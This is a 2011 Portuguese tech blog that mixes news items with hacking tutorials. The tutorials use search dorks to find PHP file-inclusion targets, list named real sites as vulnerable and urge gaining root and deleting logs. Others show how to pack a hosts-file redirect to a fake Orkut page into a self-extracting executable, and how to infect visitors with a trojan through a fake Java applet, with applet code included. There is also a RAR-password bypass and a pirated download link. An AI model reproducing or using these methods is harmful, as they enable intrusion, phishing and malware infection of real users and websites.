allinurl:".php?visualizar="
allinurl:".php?conf="

Achará varios sites, a maioria no padrão:

http://www.interreg3c.net/sixcms/list.php?page=home_en 
http://www.ourdocuments.gov/content.php?page=milestone 
http://www.safer-networking.org/index.php?page=mirrors 
http://www.serviceandinclusion.org/inde ... e=nat_conf 

Agora é simples, você tem os sites pra procurar e uma cmd, agora é só ir de página em página substituindo os valores da string page para o cmd que vai usar :}
Você pode utilizar exploits para tentar conseguir root (super user) na máquina, assim ter permissão para fazer TUDO com os sites que estão dentro dela, apagar todos os logs, etc.
Aqui vai uma lista de páginas vulneraveis (depois de ler isso vocês já saberão o que fazer), a maioria está protegida ou com firewall, é só para mostrar o que vai acontecer quando uma página é vulneravel :~)

http://www.imobmarques.com.br/pagina.php?pagina= 
http://www.effectingchange.luton.ac.uk/ ... p?content= 
http://www.tourtrans.ru/index.php?page= 
http://www.iobchody.unas.cz/index.php?page= 
http://www.balustrady.cz/index.php?page= 
http://www.kubela.iglu.cz/index.php?inc= 
http://www.engelking-elektronik.de/index.php?main=valor 
http://www.mob.hu/cgi-bin/index.php?main=valor 
http://www.medianlg.hu/index.php?site= 
http://www.spillo.it/home.php?main= 
http://www.fdf-k22.dk/index.php?main= 
http://www.astro.up.pt/investigacao/con ... .php?page= 
http://www.nyinvestmentproperties.com/index.php?main= 
http://www.timetoupgrade.us/index.php?main= 
http://www.msgames.msu.ac.th/reading.php?page= 
http://www.mobilink.com.tr/index.php?page= 
http://www.slh.org.tw/tw/index.php?page= 
http://www.climb.idv.tw/index.php?page= 
http://www.azsrc.com/index.php?page= 


Páginas com passthru() bloqueados, quando não aparece nada na box são ignorados, pode continuar procurando :B

Fonte: Dark

0
Brincando com o arquivo Host da Vitima

Primeiro vamos a onde esta o arquivo hosts.
Copie e a abra ele em um bloco



embaixo de 127.0.0.1 localhost
adcione o ip da pagina que vc quer direcionar e coloque o endereço da pagina
como no ex:200.176.3.142 http://www.orkut.com

feito isto adcione o arquivo em um winrar

- va na opção sfx
- opções avançadas do sfx

e va prenchendo conforme a imagems



depois e so dar ok
ele vai gerar um executavel em que no propio winrar da a opção de
altera o ícone, mais isto já e outra conversa.

Ao executar ,quando vc digitar o endereço por ex: do orkut
ele vai direcionar para o terra.

Tambem podia redirecionar para a sua fake do orkut ,assim escrevia o endereço verdadeiro e redireçionava para a fake com o endereço verdadeiro hehehe ,para tudo é preçiso imaginação ,pessoal se pensarmos um pouco existe milhares de maneiras de se enganar um utilizador.

0
Hacker deixa nome e e-mail ao invadir site

O site da Rapid Action Battalion (RAB), uma tropa de elite anticrime e antiterror do governo de Bangladesh, foi invadido no dia 5 deste mês por Shahee Mirza, hacker que protestou contra a falta de recursos para o desenvolvimento da tecnologia no país.

Ele e outros 3 comparsas foram presos em menos de 24 horas porque Mirza deixou seu nome e e-mail na página.

0
Serviço de blog gratuito Wordpress sofre invasão de hackers

Invasores conseguiram acesso total a “vários servidores” do serviço de blogs Wordpress, de acordo com um comunicado escrito por Matt Mullenweg, responsável pelo serviço. “Potencialmente qualquer coisa nesses servidores pode ter sido revelada”, escreveu. A Automattic, que opera o serviço, ainda está investigando como a invasão ocorreu e quais dados podem ter sido revelados, mas afirma já ter tomado medidas para prevenir novos incidentes.

Nas palavras Mullenweg, os atacantes conseguiram “acesso root”. “Root” é o nome do usuário administrador de sistemas Unix, normalmente usado em servidores, e é capaz de realizar qualquer tarefa no sistema.

De acordo com as estatísticas do próprio Wordpress.com, o serviço hospeda 19 milhões de blogs.

Códigos do software usado no site teriam sido expostos. Boa parte do Wordpress é código aberto e está disponível para download na internet, mas códigos próprios do Wordpress, que Mullenweg disse serem “sensíveis”, também foram revelados. Códigos de parceiros do WordPress.com também estariam comprometidos.

O site não ofereceu sugestões a seus usuários, além de “sempre usar uma senha forte”, “usar senhas diferentes para sites diferentes” e “se você usou a mesma senha para sites diferentes, troque para algo mais seguro”.

As recomendações não são claras, mas o tom deixa a entender que senhas de usuários poderiam ter sido reveladas, pelo menos parcialmente. Seria recomendável trocar as senhas do próprio WordPress e de serviços em que o usuário usou a mesma senha do serviço de blogs ou que foram ligados com o serviço.

No início do ano, o serviço de hospedagem de programas de código aberto Sourceforge também sofreu uma invasão semelhante.

Fonte: G1
segunda-feira, 11 de abril de 2011

1
iPhone 4 estaria espionando usuários

O fórum de discussões da Apple tem recebido relatos de que o FaceTime do iPhone 4 estaria capturando imagens sem o consentimento dos usuários. Segundo reporte de um usuário do gadget, uma foto desconhecida apareceu durante uma chamada no software de videoconferências do aparelho.

“Eu e meu namorado experimentamos o acontecido várias vezes – Quando um de nós chama o outro através do FaceTime, uma imagem antiga aparece congelada na tela, enquanto aquele que recebe a chamada vê apenas uma tela preta. É bastante assustador, porque ele trouxe até fotos de nós trabalhando, onde utilizamos o FaceTime algumas vezes, mas nunca entre nós dois. Não é terrivelmente inconveniente, mas é definitivamente inquietante, já que aparecem imagens de lugares que nós nunca tiramos fotos ou sequer usamos o FaceTime”, comentou uma usuária no mês passado.

O motivo das imagens armazenadas sem o conhecimento dos usuários ainda não foi explicada pela empresa. Não se sabe se as fotografias foram capturadas intencionalmente, devido a alguma falha no sistema operacional ou apenas como consequência do buffer de chamadas anteriores. De acordo com o relato, as figuras são armazenadas apenas no dispositivo, não sendo compartilhadas com outros equipamentos ou serviços.

0
Padre diz que hackers estão em missão divina

O padre jesuíta Antonio Spadaro publicou um texto na revista La Civiltà Cattolica elogiando os hackers, as wikis e os softwares de código aberto. Na publicação, o clérigo diz que as pessoas que trabalham em codificações, aperfeiçoamento de hardware e compartilhamento de conhecimento estão em uma missão divina.

Spadaro explica que não podemos confundir hackers com crackers. "Hackers constroem coisas, crackers quebram-nas", comentou o autor ao relacionar a cultura e ética hacker com os ensinamentos do cristianismo.

Para o jesuíta, a filosofia hacker é descontraída, porém comprometida, estimula a criatividade e se opõe aos modelos de controle, concorrência e propriedade privada. “A mentalidade hacker implica utilização divertida da inteligência para solucionar problemas, rejeitando o conceito de trabalho repetitivo, pesado e estúpido”, escreveu Antonio Spadaro.

O modelo de compartilhamento de conhecimento impulsionado pela Wikipédia foi outro tema muito abordado pelo clérigo. Segundo ele, esse é um exemplo de rede intelectual que foi capaz de transformar a própria ideia de produção cultural.

"Para criar a maior enciclopédia colaborativa da internet, estima-se que foram gastas cerca de 100 milhões de horas de trabalho intelectual, que é o equivalente ao tempo que os cidadãos dos EUA passam vendo publicidade na TV em um único fim de semana", comentou o padre jesuíta.



Leia mais no Baixaki: http://www.tecmundo.com.br/9533-padre-diz-que-hackers-estao-em-missao-divina.htm#ixzz1JEggJgb9

1
Vírus no Facebook infecta mais de 60 mil usuários

Para quem possui uma conta no Orkut, a opção “visualizar quem acessou meu perfil” é mais do que conhecida, permitindo a você controlar sua conta e conferir quem é o bisbilhoteiro (ou amigo) que está acessando as informações da página.

Portanto, nada mais comum do que um aplicativo capaz de executar essa mesma opção no Facebook. Todavia, a empresa de segurança Sophos afirma que o serviço, exatamente com o intuito de oferecer o mesmo serviço do Orkut é, na verdade, um vírus que está se alastrando pela rede social.

O aplicativo “Who Views your profile” já infectou mais de 60 mil contas, que recebiam marcações em fotos e eram convidadas a acessar o link do serviço. A mensagem maliciosa era a seguinte: “OMG. I cant believe this actually works! Now you really can see who viewed your profile!” ou, em uma tradução livre “Meu Deus! Eu não acredito que isso realmente funciona! Agora você realmente pode saber quem visualizou seu perfil!”.

Ao fornecer seu login e senha, você deveria ter acesso ao aplicativo e poderia, enfim, conferir quem havia acessado sua página. Ao invés disso, o aplicativo recolhia informações pessoais, espalhando-se também por sua rede de amigos.

Nunca é demais alertar que você deve ter muito cuidado com os links que aparecem em redes sociais, ainda mais aqueles que você não conhece. Além disso, fique de olho no nome do aplicativo, quem usa o programa e qual mensagem aparece em sua Feed de novidades, para não ser vítima desse tipo de golpe. Pelo menos, o link da "página do programa" não está mais disponível no site do Facebook.
sexta-feira, 8 de abril de 2011

0
Mortal Kombat 9 terá batalhas em equipe

Foi divulgado mais um trailer com novidades do novo Mortal Kombat, que será lançado para Xbox 360 e PlayStation 3 no dia 19 de abril. O vídeo mostra uma nova jogabilidade do game de luta, o chamado Team Match - ou "batalha em equipe". Neste modo, dá para incluir diversos personagens simultaneamente na pancadaria, lutando de dois em dois. No caso, o trailer mostra Kitana, Milena, Sindel e Jade em uma luta eletrizante.

Confira o vídeo!





A Warner Games, desenvolvedora do jogo, já havia divulgado outros vídeos com novidades do Mortal kombat 9. Kratos, o fantasma de Esparta em God Of War, estará disponível no modo "versus" do jogo de luta. Além disso, o Mortal Kombat traz a chamada Challange Tower, modalidade em que jogador terá que cumprir determinadas missões, como lutar com um personagem sem os braços ou passar em testes de sorte e memória, totalizando 300 missões. Outra novidade são os X-Ray Moves - golpe tão violento que dá para ver um Raio X do oponente atingido, avaliando os danos.

Confira os X-Ray Moves de Johnny Cage!

0
Links encurtados [ Perigo Real ]

Exceto os muito recém-chegados à rede, todo internauta sabe que não deve clicar em anexos ou links que não pediu, que deve desconfiar de mensagens ou sites que prometem vídeos inéditos de um fato muito noticiado (tsunami no Japão, por exemplo), ou cenas íntimas de celebridades. Ainda mais quando para assistir ao vídeo é preciso baixar algo. São estratégias usadas por golpistas para instalar códigos maliciosos no computador ( popularmente chamados “vírus”, para horror dos técnicos), no intuito de roubar informações bancárias e de cartão de crédito ou assumir o controle do seu computador, usá-lo em redes de computadores zumbis (botnets) e aplicar outras fraudes.

Se a mensagem, link, arquivo, vem de um estranho, é praticamente certo tratar-se de falcatrua. Mas e quando vem de um conhecido? Segundo a Symantec, fabricante da linha Norton (programas de segurança), o internauta é menos cuidadoso e tende a confiar no arquivo enviado por uma pessoa conhecida.

Essa é uma das razões para a empresa prever mais ataques com alvos específicos, como sites muito visitados, ou redes sociais. De acordo com a Symantec, os ataques na Web cresceram 93% entre 2009 e 2010(e 42% em dispositivos móveis), impulsionados principalmente pelos encurtadores de URL, sites como bit.ly, migre.me e tantos outros que transformam endereços quilométricos em outros curtinhos. Quando há limitação de espaço, como no Twitter (140 toques), isso é essencial. O problema é: o endereço curto pode mascarar uma ameaça, como um site fraudulento que tentará invadir o computador ou induzir o internauta a permitir a invasão.

Segundo a Symantec, em 2010 foram compartilhados nas redes sociais milhões de links que levavam a fraudes “disfarçados” por encurtadores, o que aumentou significativamente o sucesso dos ataques. Que fazer, então? Manter um antivírus atualizado é a mais básica das recomendações. Há opções gratuitas (AVG, Kaspersky, Avast!), que costumam funcionar melhor em conjunto. Tecnologias da Symantec (Norton Safe Web) e da McAfee (McAfee Site Advisor) há algum tempo verificam de graça se há riscos por trás de um link, mas é preciso estar sempre muito atento antes de clicar.

2
Dois anos após divulgação, GNOME 3 é lançado para Linux




Depois de mais de dois anos de desenvolvimento e quase uma década após o segundo modelo, a terceira versão de uma das interfaces gráficas mais famosas para Linux foi finalmente lançada. O GNOME 3 já está disponível desde o dia 6 de abril para download no site oficial do produto, que conta com uma lista com todas as novidades e vídeos introdutórios ao produto.

Contando com um visual totalmente reformulado e inúmeras funções adicionais. Mesmo com tantas novidades, o ponto principal do sistema é a simplicidade aliada com a modernização gráfica, resultando em algo inovador, mas que carrega traços de sistemas operacionais de empresas como a Apple.

O que mais chamou a atenção de quem já realizou o download gratuito do produto foi o GNOME Shell, a interface propriamente dita, que deixa a navegação por sistemas Linux ainda mais simples. Mudar de uma janela para outra, manter o foco em uma atividade e iniciar seus programas favoritos ficou ainda mais fácil, por exemplo.

Entre as novidades, divulgadas desde a liberação das primeiras imagens, você vai encontrar uma variedade de aplicativos e utilitários, como um sistema de notificações, um sistema de busca no próprio desktop, uma edição de textos mais dinâmica e tradução para dezenas de idiomas, incluindo português.



Leia mais no Baixaki: http://www.tecmundo.com.br/9506-dois-anos-apos-divulgacao-gnome-3-e-lancado-para-linux.htm#ixzz1IxNfvVSx
segunda-feira, 4 de abril de 2011

0
Chefe de segurança do Xbox Live tem conta hackeada

Diretor de política e responsável por banir da rede Xbox Live aqueles que trapaceiam em games on-line, Stephen Toulouse postou no Twitter neste domingo (3) que seu domínio pessoal Stepto.com estava comprometido. A informação confirma um vídeo no YouTube que mostra a conta de Toulouse na rede Xbox Live sendo modificada.

O jovem conta no vídeo que usou engenharia social no provedor de hospedagem. Se isso for verdade, ele também obteve o acesso a todos os e-mails de Toulouse, permitindo o roubo da conta Xbox Live.

Antes de ser o chefe da segurança dos games on-line da Microsoft, Toulouse era o diretor de relações públicas do Security Response Center, a equipe responsável pela produção das atualizações do Windows.

O G1 entrou em contato com a Microsoft pedindo mais informações. Até o momento, a empresa não confirmou o ataque. Toulouse já recuperou a titularidade de seu domínio.
Descuido e motivação

O invasor identifica a si mesmo como Predator. No vídeo do YouTube em que descreve o ataque, ele deixa diversas informações suas aparecerem em janelas de mensagens instantâneas e no Facebook. Comentaristas do YouTube postaram o que pode ser o seu endereço residencial.

“Amo quando dizem que as contas do Xbox Live são seguras e que a única maneira de roubá-las é quando a vítima fornece o usuário e a senha. Como se alguém como o Stepto iria simplesmente dar a senha e o usuário para alguém”, escreveu o jovem na descrição do vídeo. “Eu ofereci minha ajuda à Xbox Live, mas eles não quiseram”.

Predator teria sido banido 35 vezes do Xbox Live, o que o motivou a fazer o ataque. Ele diz também que já teria hackeado contas do Xbox Live mediante pagamento, e faz a mesma oferta na descrição do vídeo.

Fonte: G1

1
Infectando por URL

Explicando:
- A vítima entrará no seu site. Logo após, ela receberá uma falsa notificação de "java".
- Quando ela clicar na paradinha que aparece, seu server estará sendo executado.
- Sem que ela perceba!
Bom, vou tentar encurtar o tutorial, para evitar futuras complicações.

Ferramentas necessárias:
- Um Trojan: Escolha um trojan qualquer de sua preferência.
- Um host que aceite .exe ( qualquer um do seu criterio
- Um Script em Html
- Um falso Certificado de java
- E uma animação em Flash (Opcional)

Baixe as três últimas ferramentas aqui:

Download

Com todas as ferramentas em mãos, vamos as configurações:
- Baixe os Scripts acima e abra o arquivo "index.html" com o Bloco de Notas.
(Clique com o botão direito >> Abrir Com >> Bloco de Notas)
- Localize a parte do código que contém isso:


( retire os .(pontos) de dentro das tags de abertura e fechamento )
<.applet archive="link.jar" code="Inicio.class" height="10" name="link" width="1">
<.param name="url" value="site/server.exe" />
<./applet>


ATENÇÃO: A parte que está destacada no código acima, será o endereço do seu server. Para substituir, você terá de hospedar seu server no site que eu indiquei acima.
Depois pegue o link hospedado e substitua pelo que está aí e salve assim:
index.html
Todos os Arquivos
- Agora já pode hospedar todos que você baixou!
Pronto... O Script já está configurado.

Creditos: Sindicato
Tutorial: Milorde

0
Abrir Arquivos .RAR Com Senha sem brute force

O tutorial a seguir funciona apenas para descompactar arquivos únicos dentro do .rar ou .zip como filmes .avi .mpeg executaveis .exe documentos .pdf .doc e outros. Se tiver vários arquivos o processo torna-se praticamente impossível de ser feito recomenda-se também que o arquivo seja de grande tamanho para facilitação do processo.

1° você recebe a triste notícia de que o arquivo tem senha



2° Finja que vai descompacta-lo em alguma pasta qualquer. Não digite nenhuma senha, aperte apenas o ok e ele começará a descompactar.



3° Agora começa a complicação.

Espere o arquivo chegar em aproximadamente 99% (pausa) para ajudar nesse processo de algumas travadas no pc para o processo de descompactação ir mais devagar.



4° Como da pra ver o arquivo está sendo descompactado porem não aparece na tela ainda. Mas em algum lugar ele tem que estar certo.

O lugar e esse.
C:/Documents And Settings/nome do seu pc/Local Settings/Temp

(a pasta muda dependendo do disco local, da lingua do seu windows e o nome do seu pc)

Você então achara um punhado de arquivos nos quais haverá uma ou várias pastas com nomes iniciados por Rar$ em um deles estará o arquivo no qual estará descompactando



5° Agora que você encontrou o arquivo faça uma cópia dele e se prepare para ser rápido.



6° Cole o arquivo em uma pasta bem distante daquele local como no meu caso desktop/new folder.


Enquanto o processo estiver carregando a cópia vá rapidamente no rar no qual você deixou pausado e aperte continue.

7° Cancele todos os erros que aparecerão e feche o rar

Como voc percebeu o arquivo do new folder está lá porém não completamente descompactado.

Agora volte lá no C:/Documents And Settings/nome do seu pc/Local Settings/Temp/Rar$.../ o arquivo 100% descompactado estará lá esperando por você.

0
Hacker recria brincadeira de 1º de abril e mostra Gmail com movimentos

Após uma brincadeira de 1º de abrilrealizada na sexta-feira pelo Google, em que seria possível controlar o serviço de e-mails Gmail por meio de movimentos no chamado "Gmail Motion", hackers do Institute of Creative Technologies (instituto de tecnologias criativas, em tradução) mostraram que é possível recriar a mentira, mas desta vez como algo sério.

Utilizando o Kinect, acessório do Xbox 360 que capta os movimentos dos jogadores e os transporta para os games, sem a necessidade de utilizar um joystick, eles conseguiram controlar o Gmail, usando movimentos para escrever, enviar, responder e encaminhar mensagens.

Os mesmos movimentos apresentados na brincadeira do Google, como fazer o gesto de lamber um selo para enviar um e-mail ou abrir um envelope para poder ler a mensagem são usados no sistema chamado de SLOOW, Software Library Optimizing Obligatory Waving (biblioteca de otimização de software de gesticulação obrigatória, em tradução). A intenção dos criadores era criar um nome engraçado para o sistema.

0
Ataque hacker atinge um milhão de páginas na internet

Mais de um milhão de páginas da internet foram afetadas por um sofisticado ataque hacker que inseriu códigos em sites, redirecionando usuários para uma operação fraudulenta de venda de software.

O ataque chamado de "inserção em massa", que é o maior do seu tipo já visto segundo especialistas, conseguiu inserir códigos maliciosos em sites ao obter acesso aos servidores que rodavam sua base de dados, de acordo com a companhia de segurança em tecnologia que descobriu o ataque.
A Websense, que encontrou evidências do ataque mais cedo esta semana, o apelidou de "LizaMoon", nome do site para o qual o código redirecionava usuários inicialmente.

Usuários podem ser que estão sendo redirecionados quando tentam visitar um dos endereços afetados, e podem fechar a janela sem maiores prejuízos, afirmou o administrador de segurança em pesquisas da Websense Patrik Runald.

O ataque afetou pequenos sites em larga escala, disse ele, mas não há indicadores de que páginas corporativas ou sites de governos tenham sido comprometidos.
O ataque pode levar algum tempo para ser combatido, alertou Runald, pois primeiro pesquisadores precisam identificar o software que foi comprometido, e as operadoras de websites precisam instalar softwares atualizados.
quinta-feira, 24 de março de 2011

1
Amazon terá loja para Android

Devido a muitas reclamações das dificuldades em baixar aplicativos do Android, a Amazon resolveu organizar isso e abriu uma loja virtual para tal, a cada aplicativo testado pela Amazon, a segurança e a confiabilidade podem melhorar, contribuindo para tornar os telefones Android tão simples de usar como os IPhones.

O google recusou-se a comentar o assunto. A empresa não procurou lucrar com o Android Market, permitindo aos desenvolvedores ficar com o grosso das receitas. A maior parte do restante do dinheiro vai para as operadoras sem fio.

A Amazon ficará com 30% das receitas dos aplicativos pagos. Mas determinará os preços aumentando ou diminuindo os custos para os consumidores, para estimular o máximo das vendas.

1
EUA queda e BRASIL crescente em...... VIDEO GAMES

Depois de 15anos bagunçado, o setor de videogames volta a se reestruturar, pois os 4 pilares que sustentam o negocio de videogames estão presentes no brasil. Os Fabricantes de console (Sony, Microsoft e nitendo) os principais estudios de criação de jogos tem operações diretas ou, pelo menos, representações comerciais. A distribuição de softwares e equipamentos está ganhando força, e os varejistas tem aumentado o espaço dedicado aos videogames nas lojas.

Levará cerca de 3 anos para que a industria se consolide de forma definitiva no pais, dizem profissionais do setor. A falta de um numero preciso sobre as vendas de jogos e consoles estima-se de R$300milhões a R$1,1bilhão por ano, incluindo os canais oficiais e os ilegais, sendo que a receita global já ultrapassou a do cinema de US$60bilhões.

O mercado brasileiro é um dos mais atraentes para as empresas, enquanto que o americano está em queda no faturamento (8% em 2009 e de 1% em 2010 - e o Brasil cresce a taxas de 20% a 30%).

Empresas estão trazendo ao Brasil um modelo cada vez mais comum nos EUA, a proposta dessas companhias é administrar todas as fases da cadeia do setor, do processo de manufatura dos jogos em DVD ou Blu-ray até a sua distribuição. Fica fora apenas a concepção e programação dos games.



1
Alcatel-lucent + Bell Labs=up N $

Centro da Alcatel-Lucent (fabricante de equipamentos para redes de telecomunicações) alinha-se ao Bell Labs no dia 3 de maio. Com investimento de US$5milhões a unidade brasileira desenvolverá softwares e trabalhará em conjunto com a companhia franco-americana. Um dos focos será a criação de aplicações para segurança de redes e call centers, segmento que o Brasil tinha atuação relevante, agora com o investimento, o papel do Brasil terá mais "importancia". E para reforçar o trabalho de pesquisa e desenvolvimento de softwares e aplicativos, a companhia está costurando parcerias com universidades brasileiras

1
Google Down!

O acordo de US$ 125mi do google com editoras e autores foi rejeitado ontem, por um juiz americano, para quem o contrato que criaria a maior biblioteca de livros digitais do mundo seria injusto para com os autores.

Em termos atuais, o acordo concederia ao GOOGLE direitos consideráveis para explorar livros inteiros, sem permissão dos detentores de direitos autorais. Em 2005, o GOOGLE foi processado por autores e editoras que a acusavam de infringir seus direitos autorais com digitalização dos livros. O acordo previa a criação de Books Rights Registry, uma instituição que compensaria financeiramente os detentores dos direitos autorais.

Amazon, Microsoft e Yahoo, ao lado do governo da Alemanha e da França, avaliaram que o acordo daria ao GOOGLE um controle desleal sobre as obras digitalizadas e expandiria o poder da companhia no setor de ferramentas de busca na internet.

Claro, GOOGLE está decepcionado com a decisão.

0
TV por assinatura via internet.


A oferta de TV por assinatura via internet pode dar novo impulso aos investimentos em banda larga no país. Com esse argumento, empresas, representantes do governo e consultores aumentaram ontem (22/03/2011) a pressão pela liberação desse serviço, alegando que a medida servirá de estímulo para que as operadoras de telefonia fixa expandam sua infraestrutura.
O uso dessas redes atualmente não é permitido no Brasil, porém está previsto no projeto de lei 116, em tramitação no senado. Trata-se de um pleito antigo das teles, que pretendem adotar a tecnologia (IPTV) para melhorar o retorno dos seus investimentos. Atualmente, as teles prestam serviços de video via satelite ou detem participações em empresas de TV a cabo. Operadoras como Telefonica, Oi e GVT aguardam apenas a aprovação da nova lei para começar a oferecer o serviço.

O projeto de lei unifica os regulamentos da TV paga, autoriza a atuação irrestrita das teles nesse segmento e estabelece cotas de conteúdo nacional para os canais de televisão.



*fonte: Valor economico - caderno empresas - B2
quarta-feira, 23 de março de 2011

1
Eu já esperava por isso [ Firefox bate o IE9 em numero de Downloads ]

O navegador Firefox 4 recebeu o dobro de downloads que o rival Internet Explorer 9 nas primeiras 24 horas após o lançamento na terça-feira (22).

O navegador pode ser baixado pelo site da Mozilla.

Enquanto que o browser da Microsoft alcançou 2,3 milhões de downloads, o Firefox 4 atingiu mais de 6 milhões de arquivos baixados antes de completar um dia de lançamento. No entanto, a Mozilla não bateu o recorde da versão Firefox 3, que recebeu 8 milhões de downloads no primeiro dia.

A Mozilla criou um site em que mostra as estatísticas de download do Firefox 4 em tempo real. Em um mapa, é mostrado onde o navegador está sendo baixado e os números a cada minuto. O Firefox possui mais de 400 milhões de usuários ativos no mundo.

Segundo a Mozilla, a velocidade de navegação é um dos pontos altos da versão final do Firefox 4. O browser recebeu uma enorme melhoria no seu desempenho. Além de um tempo de inicialização mais veloz, a empresa afirma que o browser melhorou o carregamento das páginas e dos gráficos.
terça-feira, 22 de março de 2011

1
Liberada Atualização de Segurança para Softwares da ADOBE

Recomendo a todos que ativem a atualização automática dos programas adobe reader X  e adobe Acrobat.

Abaixo segue um texto publicado no site Baixaki que tem mais explicações:


A Adobe liberou nesta terça-feira (22 de março) uma correção de segurança para uma falha crítica de segurança no Flash Player. O problema, que tinha impacto sobre o arquivo “authplay.dll”, afetava a versão 10.2.152.33 (e anteriores) do programa trazia riscos a usuários do Windows, Linux, Mac OS X, Solaris e Android.
Para instalar a correção, o usuário precisa possuir na máquina uma cópia do Adobe Acrobat ou Adobe Reader X. Em seguida, basta abrir o programa e aguardar alguns instantes enquanto a atualização automática realiza o download da atualização que corrige a falha de segurança presente nos softwares (incluindo o Flash Player).
Usuários do Chrome já contavam com uma solução para o problema, desenvolvida pela Google para corrigir brechas de navegação. A solução da companhia não entra em conflito com o patch da Adobe, que tem como vantagem oferecer segurança a concorrentes como o Mozilla Firefox, Opera e Internet Explorer.
Segundo a Adobe, a falha de segurança estava sendo explorada através de um arquivo SWF incorporado a uma planilha do Microsoft Excel (XLS) distribuída por email. Ao abrir o arquivo, o usuário abria as portas para que outras pessoas tomassem controle da máquina e usassem os recursos do sistema operacional em proveito próprio.


Leia mais no Baixaki: http://www.baixaki.com.br/tecnologia/9255-adobe-corrige-falha-de-seguranca-no-flash-player.htm#ixzz1HLI6LSDT
segunda-feira, 21 de março de 2011

0
Versão Final do Mozilla Firefox 4 está liberada

Ae gente finalmente foi liberada a versão final de um dos melhores navegadores da historia pelo menos está e a minha opinião.
Ele promete mais segurança e velocidade durante a navegação estou testando ele depois posto os resultados.

Pra quem quiser baixar segue o link do donwload.

Download
terça-feira, 15 de março de 2011

0
Microsoft Libera o IE9

Quem é fã do Internet Explorer já pode desfrutar da mais nova versão desse navegador, eu particularmente não utilizo o IE porem vou fazer alguns teste com ele para saber se o mesmo faz tudo que a Microsoft prometeu durante o seu desenvolvimento.

Pra quem quiser testar também segue o link de Download. ( Versão para Windows 7 )

Para Windows Vista:
Download
sexta-feira, 11 de março de 2011

1
1000 Cursos da Digerati [ Muito Bom ]

1000 cursos e apostilas de informática, envolvendo várias áreas, além de vídeo aulas sobre montagem e manutenção, aplicativos para benchmark, overclock, hardware e dois capítulos do livro "Dossiê Hardware" para a leitura.


# Análise de Sistemas 45 Apostilas -> Auditoria em Informática, Indução a Ciência da Computação, Sistemas Básicos, Teste de Software Estratégias e Técnicas, Projeto de Sistemas de Software I, II, III, IV, V, VI, VII , métricas e etc;

# Banco de Dados 60 Apostilas -> Access, Banco de Dados Delphi, Banco de Dados 4 Módulos, Crystal Reports 6.0, Estrutura de Dados, Interbase 5.6 e 6.0, PHP Mysql, Instrodução ao MySql, Comandos SQL em Oracle, Oracle Linux, SQL Server 6.5, Contrução de Comandos em SQL, Dicas Oracle SQL, Principais Instruções em SQL e etc;

# Gráficos 164 Apostilas -> 3DStudio, 3DStudio Max, 3DViZ, AutoCAD Básico, CAD, Curso de AutoCAD 64 Aulas, Curso de CAD 3D 10 Aulas, Lições de Computação Gráfica, CorelDraw 8, Efeitos no PhotoPaint, Conceitos de Cores, Editoração Eletrônica, Fotografia Digital e Foto Jornalismo, Freehand 8, Manipulação 3D, Fundamentos Gráficos, Lições e Tutoriais GIMP, OpenGL, Programação Open, Lições Zbrush e etc;

# Hardware 30 Apostilas -> Disco Rígido, Expandindo a Memória, Funcionamento Interno, Gabinetes, Manuseio de Equipamentos, Montagem, Placas de Vídeo, Placa-Mãe, Sistemas de Controle, Barramentos I e II, CD-ROM, Como Montar um PC, BIOS Setup, Evolução dos Processadores e etc;

# Linux 9 Apostilas -> Comandos Básicos do Linux, Debian GNU, Editor de Textos, Linux Passo a Passo 1 e 2, Programação C-Shell, Samba e Samba Avançado e Apostila de Linux;

# Programação 219 Apostilas -> Algoritmo, Algoritmo Estruturado, Lições ASP, Assembly 26 Capítulos, Assembly para Iniciantes, Apostila C, C++, Aplicações Gráficas 3D em C, Curso de C, 47 Tutoriais em C, Instrodução ao C, Uso de CGI, Segurança em CGI, Clipper, Delphi , Curso Delphi, Recursos do Delphi, Fundamentos Object Pascal, Produção de DLL em Delphi, Programação em JAVA, Certificação em Java, Java Swing, Java Orientado a Objetos, 300 Idéias para Programar, Programação Estruturada, Realidade Virtual, Visual Basic 90 Dicas, VBScript, Desenvolvendo aplicações em Visual Basic, Instrodução ao Visual Basic 5, Visual Basic 5 Avançado, Visual Basic 6 para VB .NET, Computação de Alto Desempenho, Ferramentas CASE e etc;

# Redes 14 Apostilas -> Configurando Rede Local, Montando Pequenas Redes, Arquitetura TCP-IP 1 e 2, Cabeamento Estruturado, Cabeamento, Especificação Técnica, Gerência Integrada, Introdução SDH, Introdução, Segurança, TCP-IP Estudo Geral, Treinamento em Redes, TCP-IP;

# Webdesign 318 Apostilas -> Director, Director 7, Dreamweaver - Comandos, Dicas, Formulários, Login, Navigation Bar, Templates e etc, Fireworks - Botões Aqua, Criando Logomarca, Criando Menu, Curvas, Fatiando um Layout, Pixel Art, Texto Linear, Sombra Perspectiva e etc, Flash - ActionScript 1 e 2, Efeitos, Guia Passo a Passo, Menu Seguindo o Mouse, Prototype, Standards ActionScript, Variáveis com JavaScript e etc, FreeHand, Como Construir HomePage, WebDesigner, PageMaker, Photoshop - Palheta Toolbox, Palheta Navigator, Background, Botão 3D com textura 3D, Canais do Photoshop 1,2,3,4 ; Colorindo Imagens PB, Como fazer Brushes, Contornos a Mão Livre, Criando GIF Transparente, Criando Densidade em Imagens, Efeito Metal Líquido, Efeito Fogo, Efeito Reflexo, Efeito Psicodélico, Entalho, Logotipo em Background, Montagem, Neon, Plasma, Removendo Olhos Vermelhos, Suavizando Bordas, Textos Cromados, Tutorial, Usando as Barras dos Menus, Usando a Régua, Transformando uma foto em desenhos de linhas e etc;

# WebMaster 143 Apostilas -> ASP, CGI Pearl, Curso ASP, Programação para Internet - ASP, CSS, DHTML, Cold Fusion Módulo 1 e 2, Eudora, Noções Básicas, Guia de Relatórios Via WEB, OBDC, PHP, Segurança para Internet, WebMaster, XML, Zone Alarm, Apostila HTML, HTML para iniciantes, HTML Completo, Várias Dicas JavaScript, JSP, Instalando Servidor de JSP, Instalando Servidor de JSP no Linux, 17 Lições de Pearl, Tutorial Perl, Aplicações Web em PHP, 4 Módulos de PHP, PHP Avançado, WML e etc.



Nome do Autor: digerati
Editora: digerati
Qtd. de Páginas: '
Formato do Arquivo: .rar
Gênero: informática
Idioma: Português-br
Tamanho: 690 MB

DOWNLOAD
http://www.megaupload.com/?d=PII27MZ3
 
ST Informática | © 2010 by DheTemplate.com | Supported by Promotions And Coupons Shopping & WordPress Theme 2 Blog